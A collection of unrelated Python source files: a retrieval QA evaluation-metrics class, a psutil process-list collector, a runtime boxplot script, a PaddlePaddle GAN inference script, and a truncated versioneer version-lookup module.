df = self._filter_eval_mode(df, eval_mode)
answer_metrics = self._calculate_answer_metrics(
df, simulated_top_k_reader=simulated_top_k_reader, simulated_top_k_retriever=simulated_top_k_retriever
)
document_metrics = self._calculate_document_metrics(
df, simulated_top_k_retriever=simulated_top_k_retriever, doc_relevance_col=doc_relevance_col
)
return {**answer_metrics, **document_metrics}
def _filter_eval_mode(self, df: pd.DataFrame, eval_mode: str) -> pd.DataFrame:
if "eval_mode" in df.columns:
df = df[df["eval_mode"] == eval_mode]
else:
logger.warning("eval dataframe has no eval_mode column. eval_mode param will be ignored.")
return df
def _calculate_answer_metrics(
self, df: pd.DataFrame, simulated_top_k_reader: int = -1, simulated_top_k_retriever: int = -1
) -> Dict[str, float]:
answers = df[df["type"] == "answer"]
if len(answers) == 0:
return {}
metrics_df = self._build_answer_metrics_df(
answers, simulated_top_k_reader=simulated_top_k_reader, simulated_top_k_retriever=simulated_top_k_retriever
)
return {metric: metrics_df[metric].mean() for metric in metrics_df.columns}
def _build_answer_metrics_df(
self, answers: pd.DataFrame, simulated_top_k_reader: int = -1, simulated_top_k_retriever: int = -1
) -> pd.DataFrame:
"""
Builds a dataframe containing answer metrics (columns) per query (index).
Answer metrics are:
- exact_match (Did the query exactly return any gold answer? -> 1.0 or 0.0)
- f1 (How well does the best matching returned results overlap with any gold answer on token basis?)
        - sas if a SAS model has been provided during pipeline.eval() (How semantically similar is the prediction to the gold answers?)
"""
queries = answers["query"].unique()
# simulate top k reader
if simulated_top_k_reader != -1:
answers = answers[answers["rank"] <= simulated_top_k_reader]
# simulate top k retriever
if simulated_top_k_retriever != -1:
documents = self._get_documents_df()
top_k_documents = documents[documents["rank"] <= simulated_top_k_retriever]
simulated_answers = []
for query in queries:
top_k_document_ids = top_k_documents[top_k_documents["query"] == query]["document_id"].unique()
query_answers = answers[answers["query"] == query]
simulated_query_answers = query_answers[query_answers["document_id"].isin(top_k_document_ids)]
simulated_query_answers["rank"] = np.arange(1, len(simulated_query_answers) + 1)
simulated_answers.append(simulated_query_answers)
answers = pd.concat(simulated_answers)
# build metrics df
metrics = []
for query in queries:
query_df = answers[answers["query"] == query]
metrics_cols = set(query_df.columns).intersection(["exact_match", "f1", "sas"])
query_metrics = {metric: query_df[metric].max() if len(query_df) > 0 else 0.0 for metric in metrics_cols}
metrics.append(query_metrics)
metrics_df = pd.DataFrame.from_records(metrics, index=queries)
return metrics_df
def _get_documents_df(self):
document_dfs = [
node_df for node_df in self.node_results.values() if len(node_df[node_df["type"] == "document"]) > 0
]
if len(document_dfs) != 1:
raise ValueError("cannot detect retriever dataframe")
documents_df = document_dfs[0]
documents_df = documents_df[documents_df["type"] == "document"]
return documents_df
def _calculate_document_metrics(
self, df: pd.DataFrame, simulated_top_k_retriever: int = -1, doc_relevance_col: str = "gold_id_match"
) -> Dict[str, float]:
documents = df[df["type"] == "document"]
if len(documents) == 0:
return {}
metrics_df = self._build_document_metrics_df(
documents, simulated_top_k_retriever=simulated_top_k_retriever, doc_relevance_col=doc_relevance_col
)
return {metric: metrics_df[metric].mean() for metric in metrics_df.columns}
def _build_document_metrics_df(
self, documents: pd.DataFrame, simulated_top_k_retriever: int = -1, doc_relevance_col: str = "gold_id_match"
) -> pd.DataFrame:
"""
Builds a dataframe containing document metrics (columns) per query (index).
Document metrics are:
- mrr (Mean Reciprocal Rank: see https://en.wikipedia.org/wiki/Mean_reciprocal_rank)
- map (Mean Average Precision: see https://en.wikipedia.org/wiki/Evaluation_measures_(information_retrieval)#Mean_average_precision)
- precision (Precision: How many of the returned documents were relevant?)
- recall_multi_hit (Recall according to Information Retrieval definition: How many of the relevant documents were retrieved per query?)
- recall_single_hit (Recall for Question Answering: Did the query return at least one relevant document? -> 1.0 or 0.0)
"""
if simulated_top_k_retriever != -1:
documents = documents[documents["rank"] <= simulated_top_k_retriever]
metrics = []
queries = documents["query"].unique()
for query in queries:
query_df = documents[documents["query"] == query]
gold_ids = query_df["gold_document_ids"].iloc[0]
retrieved = len(query_df)
relevance_criteria_ids = list(query_df[query_df[doc_relevance_col] == 1]["document_id"].values)
num_relevants = len(set(gold_ids + relevance_criteria_ids))
num_retrieved_relevants = query_df[doc_relevance_col].values.sum()
rank_retrieved_relevants = query_df[query_df[doc_relevance_col] == 1]["rank"].values
avp_retrieved_relevants = [
query_df[doc_relevance_col].values[: int(rank)].sum() / rank for rank in rank_retrieved_relevants
]
avg_precision = np.sum(avp_retrieved_relevants) / num_relevants if num_relevants > 0 else 0.0
recall_multi_hit = num_retrieved_relevants / num_relevants if num_relevants > 0 else 0.0
recall_single_hit = min(num_retrieved_relevants, 1)
precision = num_retrieved_relevants / retrieved if retrieved > 0 else 0.0
rr = 1.0 / rank_retrieved_relevants.min() if len(rank_retrieved_relevants) > 0 else 0.0
dcg = (
np.sum([1.0 / np.log2(rank + 1) for rank in rank_retrieved_relevants])
if len(rank_retrieved_relevants) > 0
else 0.0
)
idcg = (
np.sum([1.0 / np.log2(rank + 1) for rank in range(1, num_relevants + 1)]) if num_relevants > 0 else 1.0
)
ndcg = dcg / idcg
metrics.append(
{
"recall_multi_hit": recall_multi_hit,
"recall_single_hit": recall_single_hit,
"precision": precision,
"map": avg_precision,
"mrr": rr,
"ndcg": ndcg,
}
)
metrics_df = pd.DataFrame.from_records(metrics, index=queries)
return metrics_df
def save(self, out_dir: Union[str, Path]):
"""
Saves the evaluation result.
The result of each node is saved in a separate csv with file name {node_name}.csv to the out_dir folder.
:param out_dir: Path to the target folder the csvs will be saved.
"""
out_dir = out_dir if isinstance(out_dir, Path) else Path(out_dir)
for node_name, df in self.node_results.items():
target_path = out_dir / f"{node_name}.csv"
df.to_csv(target_path, index=False, header=True)
@classmethod
def load(cls, load_dir: Union[str, Path]):
"""
Loads the evaluation result from disk. Expects one csv file per node. See save() for further information.
:param load_dir: The directory containing the csv files.
"""
load_dir = load_dir if isinstance(load_dir, Path) else Path(load_dir)
csv_files = [file for file in load_dir.iterdir() if file.is_file() and file.suffix == ".csv"]
cols_to_convert = ["gold_document_ids", "gold_document_contents", "gold_answers", "gold_offsets_in_documents"]
converters = dict.fromkeys(cols_to_convert, ast.literal_eval)
node_results = {file.stem: pd.read_csv(file, header=0, converters=converters) for file in csv_files}
result = cls(node_results)
return result
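# --- Illustrative usage sketch (not part of the original module) ---------------------
# Typical interaction with an EvaluationResult as it might be returned by pipeline.eval().
# The node names ("Retriever", "Reader") and the output directory are assumptions made for
# this sketch; the function is never called anywhere.
def _example_evaluation_result_usage(eval_result: "EvaluationResult"):
    # Aggregated metrics per node, simulating a reader that only returns its top answer
    metrics = eval_result.calculate_metrics(simulated_top_k_reader=1)
    retriever_recall = metrics.get("Retriever", {}).get("recall_single_hit")
    # The three worst performing queries of the reader node
    worst = eval_result.wrong_examples(node="Reader", n=3)
    # Persist one csv per node, then reload the whole result later
    out_dir = Path("eval_results")
    out_dir.mkdir(parents=True, exist_ok=True)
    eval_result.save(out_dir)
    reloaded = EvaluationResult.load(out_dir)
    return retriever_recall, worst, reloaded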
|
the-stack_106_15887
|
import csv
import logging
import psutil
from intelligence import intelligence
class processlist( intelligence ):
def __init__( self, output_type='csv' ):
        super(processlist, self).__init__( output_type=output_type )
self.default_headers = None
def run( self ):
self.logger.info( 'running proc' )
for proc in psutil.process_iter( ):
r = proc.as_dict( )
if not self.default_headers:
self.logger.info( 'set CSV output headers' )
                self.default_headers = list( r.keys() )
self.add_result( proc.as_dict() )
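# Illustrative usage sketch (not part of the original module): how this collector might be
# run directly. How the collected results are ultimately written (CSV output, logger setup)
# depends on the `intelligence` base class, which is not shown here, so this is an assumption.
if __name__ == '__main__':
    logging.basicConfig( level=logging.INFO )
    collector = processlist( output_type='csv' )
    collector.run( )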
|
the-stack_106_15888
|
# **********************************************************************************************************************
#
# brief: simple script to plot runtimes
#
# author: Lukas Reithmeier
# date: 16.08.2020
#
# **********************************************************************************************************************
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import os
plt.style.use('ggplot')
SMALL_SIZE = 14
MEDIUM_SIZE = 16
BIGGER_SIZE = 18
plt.rc('font', size=SMALL_SIZE) # controls default text sizes
plt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title
plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels
plt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize
plt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title
FILE_DIR = os.path.abspath("../../")
runtime_rgb = np.load(FILE_DIR + "/runtimes_CPU_ELEVATOR_RGB.npy").clip(min=0)
runtime_d3 = np.load(FILE_DIR + "/runtimes_CPU_ELEVATOR_D3.npy").clip(min=0)
runtime_rgbd = np.load(FILE_DIR + "/runtimes_CPU_ELEVATOR_RGBD.npy").clip(min=0)
runtime_rgbdf = np.load(FILE_DIR + "/runtimes_CPU_ELEVATOR_RGBDFusenet.npy").clip(min=0)
print(runtime_rgb.mean())
print(runtime_rgb.std())
print(runtime_d3.mean())
print(runtime_d3.std())
print(runtime_rgbd.mean())
print(runtime_rgbd.std())
print(runtime_rgbdf.mean())
print(runtime_rgbdf.std())
print(runtime_rgb.shape)
fig, ax = plt.subplots()
data = pd.DataFrame()
data["RGB"] = runtime_rgb
data["D3"] = runtime_d3
data["RGBD"] = runtime_rgbd
data["RGBD-F"] = runtime_rgbdf
data.boxplot()
print(data.shape)
ax.set_xlabel("model-version")
ax.set_ylabel("inference time")
plt.show()
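# Optional sketch (not part of the original script): collect the mean and standard deviation
# of the inference times per model variant in one summary table instead of the separate
# print() calls above. Uses only the `data` DataFrame defined earlier.
summary = pd.DataFrame({"mean": data.mean(), "std": data.std()})
print(summary)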
|
the-stack_106_15891
|
#copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import functools
import os
from PIL import Image
import paddle.fluid as fluid
import paddle
import numpy as np
import imageio
import glob
from util.config import add_arguments, print_arguments
from data_reader import celeba_reader_creator, reader_creator, triplex_reader_creator
from util.utility import check_attribute_conflict, check_gpu, save_batch_image, check_version
from util import utility
import copy
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
# yapf: disable
add_arg('model_net', str, 'CGAN', "The model used")
add_arg('net_G', str, "resnet_9block", "Choose the CycleGAN and Pix2pix generator's network, choose in [resnet_9block|resnet_6block|unet_128|unet_256]")
add_arg('init_model', str, None, "The init model file of directory.")
add_arg('output', str, "./infer_result", "The directory the inference results will be saved to.")
add_arg('input_style', str, "A", "The style of the input, A or B")
add_arg('norm_type', str, "batch_norm", "Which normalization to used")
add_arg('crop_type', str, None, "Which crop type to use")
add_arg('use_gpu', bool, True, "Whether to use GPU to train.")
add_arg('dropout', bool, False, "Whether to use dropout")
add_arg('g_base_dims', int, 64, "Base channels in CycleGAN generator")
add_arg('ngf', int, 64, "Base channels in SPADE generator")
add_arg('c_dim', int, 13, "the size of attrs")
add_arg('use_gru', bool, False, "Whether to use GRU")
add_arg('crop_size', int, 178, "crop size")
add_arg('image_size', int, 128, "image size")
add_arg('load_height', int, 128, "image size")
add_arg('load_width', int, 128, "image size")
add_arg('crop_height', int, 128, "height of crop size")
add_arg('crop_width', int, 128, "width of crop size")
add_arg('selected_attrs', str,
"Bald,Bangs,Black_Hair,Blond_Hair,Brown_Hair,Bushy_Eyebrows,Eyeglasses,Male,Mouth_Slightly_Open,Mustache,No_Beard,Pale_Skin,Young",
"the attributes we selected to change")
add_arg('n_samples', int, 16, "batch size when test")
add_arg('test_list', str, "./data/celeba/list_attr_celeba.txt", "the test list file")
add_arg('dataset_dir', str, "./data/celeba/", "the dataset directory to be infered")
add_arg('n_layers', int, 5, "default layers in generator")
add_arg('gru_n_layers', int, 4, "default layers of GRU in generator")
add_arg('noise_size', int, 100, "the noise dimension")
add_arg('label_nc', int, 36, "label numbers of SPADE")
add_arg('no_instance', type=bool, default=False, help="Whether to use instance label.")
# yapf: enable
def infer(args):
data_shape = [-1, 3, args.image_size, args.image_size]
input = fluid.layers.data(name='input', shape=data_shape, dtype='float32')
label_org_ = fluid.layers.data(
name='label_org_', shape=[args.c_dim], dtype='float32')
label_trg_ = fluid.layers.data(
name='label_trg_', shape=[args.c_dim], dtype='float32')
image_name = fluid.layers.data(
name='image_name', shape=[args.n_samples], dtype='int32')
model_name = 'net_G'
if args.model_net == 'CycleGAN':
loader = fluid.io.DataLoader.from_generator(
feed_list=[input, image_name],
capacity=4, ## batch_size * 4
iterable=True,
use_double_buffer=True)
from network.CycleGAN_network import CycleGAN_model
model = CycleGAN_model()
if args.input_style == "A":
fake = model.network_G(input, name="GA", cfg=args)
elif args.input_style == "B":
fake = model.network_G(input, name="GB", cfg=args)
else:
raise "Input with style [%s] is not supported." % args.input_style
elif args.model_net == 'Pix2pix':
loader = fluid.io.DataLoader.from_generator(
feed_list=[input, image_name],
capacity=4, ## batch_size * 4
iterable=True,
use_double_buffer=True)
from network.Pix2pix_network import Pix2pix_model
model = Pix2pix_model()
fake = model.network_G(input, "generator", cfg=args)
elif args.model_net == 'StarGAN':
py_reader = fluid.io.PyReader(
feed_list=[input, label_org_, label_trg_, image_name],
capacity=32,
iterable=True,
use_double_buffer=True)
from network.StarGAN_network import StarGAN_model
model = StarGAN_model()
fake = model.network_G(input, label_trg_, name="g_main", cfg=args)
elif args.model_net == 'STGAN':
from network.STGAN_network import STGAN_model
py_reader = fluid.io.PyReader(
feed_list=[input, label_org_, label_trg_, image_name],
capacity=32,
iterable=True,
use_double_buffer=True)
model = STGAN_model()
fake, _ = model.network_G(
input,
label_org_,
label_trg_,
cfg=args,
name='generator',
is_test=True)
elif args.model_net == 'AttGAN':
from network.AttGAN_network import AttGAN_model
py_reader = fluid.io.PyReader(
feed_list=[input, label_org_, label_trg_, image_name],
capacity=32,
iterable=True,
use_double_buffer=True)
model = AttGAN_model()
fake, _ = model.network_G(
input,
label_org_,
label_trg_,
cfg=args,
name='generator',
is_test=True)
elif args.model_net == 'CGAN':
noise = fluid.layers.data(
name='noise', shape=[args.noise_size], dtype='float32')
conditions = fluid.layers.data(
name='conditions', shape=[1], dtype='float32')
from network.CGAN_network import CGAN_model
model = CGAN_model(args.n_samples)
fake = model.network_G(noise, conditions, name="G")
elif args.model_net == 'DCGAN':
noise = fluid.layers.data(
name='noise', shape=[args.noise_size], dtype='float32')
from network.DCGAN_network import DCGAN_model
model = DCGAN_model(args.n_samples)
fake = model.network_G(noise, name="G")
elif args.model_net == 'SPADE':
label_shape = [None, args.label_nc, args.crop_height, args.crop_width]
spade_data_shape = [None, 1, args.crop_height, args.crop_width]
from network.SPADE_network import SPADE_model
model = SPADE_model()
input_label = fluid.data(
name='input_label', shape=label_shape, dtype='float32')
input_ins = fluid.data(
name='input_ins', shape=spade_data_shape, dtype='float32')
input_ = fluid.layers.concat([input_label, input_ins], 1)
fake = model.network_G(input_, "generator", cfg=args, is_test=True)
else:
raise NotImplementedError("model_net {} is not support".format(
args.model_net))
def _compute_start_end(image_name):
image_name_start = np.array(image_name)[0].astype('int32')
image_name_end = image_name_start + args.n_samples - 1
image_name_save = str(np.array(image_name)[0].astype('int32')) + '.jpg'
print("read {}.jpg ~ {}.jpg".format(image_name_start, image_name_end))
return image_name_save
# prepare environment
place = fluid.CPUPlace()
if args.use_gpu:
place = fluid.CUDAPlace(0)
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
for var in fluid.default_main_program().global_block().all_parameters():
print(var.name)
print(args.init_model + '/' + model_name)
fluid.io.load_persistables(exe, os.path.join(args.init_model, model_name))
print('load params done')
if not os.path.exists(args.output):
os.makedirs(args.output)
attr_names = args.selected_attrs.split(',')
if args.model_net == 'AttGAN' or args.model_net == 'STGAN':
test_reader = celeba_reader_creator(
image_dir=args.dataset_dir,
list_filename=args.test_list,
args=args,
mode="VAL")
reader_test = test_reader.make_reader(return_name=True)
py_reader.decorate_batch_generator(
reader_test,
places=fluid.cuda_places() if args.use_gpu else fluid.cpu_places())
for data in py_reader():
real_img, label_org, label_trg, image_name = data[0]['input'], data[
0]['label_org_'], data[0]['label_trg_'], data[0]['image_name']
image_name_save = _compute_start_end(image_name)
real_img_temp = save_batch_image(np.array(real_img))
images = [real_img_temp]
for i in range(args.c_dim):
label_trg_tmp = copy.deepcopy(np.array(label_trg))
for j in range(len(label_trg_tmp)):
label_trg_tmp[j][i] = 1.0 - label_trg_tmp[j][i]
label_trg_tmp = check_attribute_conflict(
label_trg_tmp, attr_names[i], attr_names)
label_org_tmp = list(
map(lambda x: ((x * 2) - 1) * 0.5, np.array(label_org)))
label_trg_tmp = list(
map(lambda x: ((x * 2) - 1) * 0.5, label_trg_tmp))
if args.model_net == 'AttGAN':
for k in range(len(label_trg_tmp)):
label_trg_tmp[k][i] = label_trg_tmp[k][i] * 2.0
tensor_label_org_ = fluid.LoDTensor()
tensor_label_trg_ = fluid.LoDTensor()
tensor_label_org_.set(label_org_tmp, place)
tensor_label_trg_.set(label_trg_tmp, place)
out = exe.run(feed={
"input": real_img,
"label_org_": tensor_label_org_,
"label_trg_": tensor_label_trg_
},
fetch_list=[fake.name])
fake_temp = save_batch_image(out[0])
images.append(fake_temp)
images_concat = np.concatenate(images, 1)
if len(np.array(label_org)) > 1:
images_concat = np.concatenate(images_concat, 1)
imageio.imwrite(
os.path.join(args.output, "fake_img_" + image_name_save), (
(images_concat + 1) * 127.5).astype(np.uint8))
elif args.model_net == 'StarGAN':
test_reader = celeba_reader_creator(
image_dir=args.dataset_dir,
list_filename=args.test_list,
args=args,
mode="VAL")
reader_test = test_reader.make_reader(return_name=True)
py_reader.decorate_batch_generator(
reader_test,
places=fluid.cuda_places() if args.use_gpu else fluid.cpu_places())
for data in py_reader():
real_img, label_org, label_trg, image_name = data[0]['input'], data[
0]['label_org_'], data[0]['label_trg_'], data[0]['image_name']
image_name_save = _compute_start_end(image_name)
real_img_temp = save_batch_image(np.array(real_img))
images = [real_img_temp]
for i in range(args.c_dim):
label_trg_tmp = copy.deepcopy(np.array(label_org))
for j in range(len(np.array(label_org))):
label_trg_tmp[j][i] = 1.0 - label_trg_tmp[j][i]
label_trg_tmp = check_attribute_conflict(
label_trg_tmp, attr_names[i], attr_names)
tensor_label_trg_ = fluid.LoDTensor()
tensor_label_trg_.set(label_trg_tmp, place)
out = exe.run(
feed={"input": real_img,
"label_trg_": tensor_label_trg_},
fetch_list=[fake.name])
fake_temp = save_batch_image(out[0])
images.append(fake_temp)
images_concat = np.concatenate(images, 1)
if len(np.array(label_org)) > 1:
images_concat = np.concatenate(images_concat, 1)
imageio.imwrite(
os.path.join(args.output, "fake_img_" + image_name_save), (
(images_concat + 1) * 127.5).astype(np.uint8))
elif args.model_net == 'Pix2pix' or args.model_net == 'CycleGAN':
test_reader = reader_creator(
image_dir=args.dataset_dir,
list_filename=args.test_list,
shuffle=False,
batch_size=args.n_samples,
mode="VAL")
reader_test = test_reader.make_reader(args, return_name=True)
loader.set_batch_generator(
reader_test,
places=fluid.cuda_places() if args.use_gpu else fluid.cpu_places())
id2name = test_reader.id2name
for data in loader():
real_img, image_name = data[0]['input'], data[0]['image_name']
image_name = id2name[np.array(image_name).astype('int32')[0]]
print("read: ", image_name)
fake_temp = exe.run(fetch_list=[fake.name],
feed={"input": real_img})
fake_temp = np.squeeze(fake_temp[0]).transpose([1, 2, 0])
input_temp = np.squeeze(np.array(real_img)[0]).transpose([1, 2, 0])
imageio.imwrite(
os.path.join(args.output, "fake_" + image_name), (
(fake_temp + 1) * 127.5).astype(np.uint8))
elif args.model_net == 'SPADE':
test_reader = triplex_reader_creator(
image_dir=args.dataset_dir,
list_filename=args.test_list,
shuffle=False,
batch_size=1,
mode="TEST")
id2name = test_reader.id2name
reader_test = test_reader.make_reader(args, return_name=True)
for data in zip(reader_test()):
data_A, data_B, data_C, name = data[0]
name = id2name[np.array(name).astype('int32')[0]]
print("read: ", name)
tensor_A = fluid.LoDTensor()
tensor_C = fluid.LoDTensor()
tensor_A.set(data_A, place)
tensor_C.set(data_C, place)
fake_B_temp = exe.run(
fetch_list=[fake.name],
feed={"input_label": tensor_A,
"input_ins": tensor_C})
fake_B_temp = np.squeeze(fake_B_temp[0]).transpose([1, 2, 0])
input_B_temp = np.squeeze(data_B[0]).transpose([1, 2, 0])
imageio.imwrite(args.output + "/fakeB_" + "_" + name, (
(fake_B_temp + 1) * 127.5).astype(np.uint8))
imageio.imwrite(args.output + "/real_" + "_" + name, (
(input_B_temp + 1) * 127.5).astype(np.uint8))
elif args.model_net == 'CGAN':
noise_data = np.random.uniform(
low=-1.0, high=1.0,
size=[args.n_samples, args.noise_size]).astype('float32')
label = np.random.randint(
0, 9, size=[args.n_samples, 1]).astype('float32')
noise_tensor = fluid.LoDTensor()
conditions_tensor = fluid.LoDTensor()
noise_tensor.set(noise_data, place)
conditions_tensor.set(label, place)
fake_temp = exe.run(
fetch_list=[fake.name],
feed={"noise": noise_tensor,
"conditions": conditions_tensor})[0]
fake_image = np.reshape(fake_temp, (args.n_samples, -1))
fig = utility.plot(fake_image)
plt.savefig(
os.path.join(args.output, 'fake_cgan.png'), bbox_inches='tight')
plt.close(fig)
elif args.model_net == 'DCGAN':
noise_data = np.random.uniform(
low=-1.0, high=1.0,
size=[args.n_samples, args.noise_size]).astype('float32')
noise_tensor = fluid.LoDTensor()
noise_tensor.set(noise_data, place)
fake_temp = exe.run(fetch_list=[fake.name],
feed={"noise": noise_tensor})[0]
fake_image = np.reshape(fake_temp, (args.n_samples, -1))
fig = utility.plot(fake_image)
plt.savefig(
os.path.join(args.output, 'fake_dcgan.png'), bbox_inches='tight')
plt.close(fig)
else:
raise NotImplementedError("model_net {} is not support".format(
args.model_net))
if __name__ == "__main__":
args = parser.parse_args()
print_arguments(args)
check_gpu(args.use_gpu)
check_version()
infer(args)
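# Example invocation (hypothetical paths and checkpoint directory, for illustration only):
#   python infer.py --model_net CycleGAN --net_G resnet_9block --input_style A \
#       --init_model ./output/cyclegan/checkpoints/199 \
#       --dataset_dir ./data/horse2zebra/ --test_list ./data/horse2zebra/testA.txt \
#       --output ./infer_result/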
|
the-stack_106_15892
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = ""
cfg.parentdir_prefix = "dask-mpi-"
cfg.versionfile_source = "dask_mpi/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
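# Note (not part of the generated versioneer file): register_vcs_handler() only fills the
# HANDLERS registry, so once the decorated functions below are defined, a lookup such as
#   HANDLERS["git"]["get_keywords"]
# returns the corresponding handler function for that VCS/method pair.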
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False, env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen(
[c] + args,
cwd=cwd,
env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr else None),
)
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {
"version": dirname[len(parentdir_prefix) :],
"full-revisionid": None,
"dirty": False,
"error": None,
"date": None,
}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print(
"Tried directories %s but none started with prefix %s"
% (str(rootdirs), parentdir_prefix)
)
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG) :] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "main".
tags = set([r for r in refs if re.search(r"\d", r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix) :]
if verbose:
print("picking %s" % r)
return {
"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False,
"error": None,
"date": date,
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {
"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False,
"error": "no suitable tags",
"date": None,
}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root, hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(
GITS,
[
"describe",
"--tags",
"--dirty",
"--always",
"--long",
"--match",
"%s*" % tag_prefix,
],
cwd=root,
)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
